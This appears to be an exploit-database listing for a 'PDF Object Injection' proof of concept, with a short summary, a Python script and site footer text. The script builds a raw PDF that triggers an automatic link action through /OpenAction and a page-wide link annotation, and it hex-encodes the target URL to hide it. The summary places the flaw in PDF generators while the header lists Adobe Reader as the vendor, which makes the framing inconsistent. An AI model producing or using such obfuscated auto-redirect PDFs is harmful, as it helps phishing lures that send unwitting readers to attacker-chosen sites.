Vulners
Lucene search
📄 PDF Object Injection Generator
=============================================================================================================================================
| # Title : PDF Object Injection Vulnerability – Impact on PDF Readers |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : https://get.adobe.com/reader/ |
=============================================================================================================================================
[+] Summary : PDF Object Injection is a vulnerability in applications that dynamically generate PDFs from user input without proper validation or escaping.
An attacker can inject PDF objects (e.g., /OpenAction, /URI, or JavaScript), potentially creating malicious PDFs that perform automatic link redirects, execute scripts, or modify metadata.
This vulnerability exists in the PDF-generating application, not in PDF readers like Adobe Acrobat, Chrome, or Firefox. Proper input sanitization, escaping, and secure PDF libraries prevent this issue
[+] Note : that you do not need external libraries such as jsPDF.
The same exploit works with the jsPDF library.
[+] POC :
import os
def create_raw_obfuscated_pdf(filename, target_url):
hex_url = "".join([f"{ord(c):02x}" for c in target_url])
hex_payload = f"<{hex_url}>"
pdf_content = (
f"%PDF-1.7\n"
f"1 0 obj\n<< /Type /Catalog /Pages 2 0 R /OpenAction 5 0 R >>\nendobj\n"
f"2 0 obj\n<< /Type /Pages /Kids [3 0 R] /Count 1 >>\nendobj\n"
f"3 0 obj\n<< /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] /Annots [4 0 R] >>\nendobj\n"
f"4 0 obj\n<< /Type /Annot /Subtype /Link /Rect [0 0 612 792] /Border [0 0 0] /A 5 0 R >>\nendobj\n"
f"5 0 obj\n<< /S /URI /URI {hex_payload} >>\nendobj\n"
f"xref\n0 6\n0000000000 65535 f\n0000000010 00000 n\n0000000079 00000 n\n"
f"0000000139 00000 n\n0000000220 00000 n\n0000000318 00000 n\ntrailer\n"
f"<< /Size 6 /Root 1 0 R >>\nstartxref\n400\n%%EOF"
)
try:
with open(filename, "wb") as f:
f.write(pdf_content.encode('latin-1'))
print("-" * 50)
print(f" Raw file created (No libraries used): {filename}")
print(f" Obfuscated link inside the file: {hex_payload}")
print("-" * 50)
except Exception as e:
print(f" Write error: {e}")
if __name__ == "__main__":
desktop = os.path.join(os.environ['USERPROFILE'], 'Desktop')
file_path = os.path.join(desktop, "Pure_Raw_Exploit.pdf")
target = "https://packetstorm.news"
create_raw_obfuscated_pdf(file_path, target)
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
25 Feb 2026 00:00Current
5.5Medium risk
Vulners AI Score5.5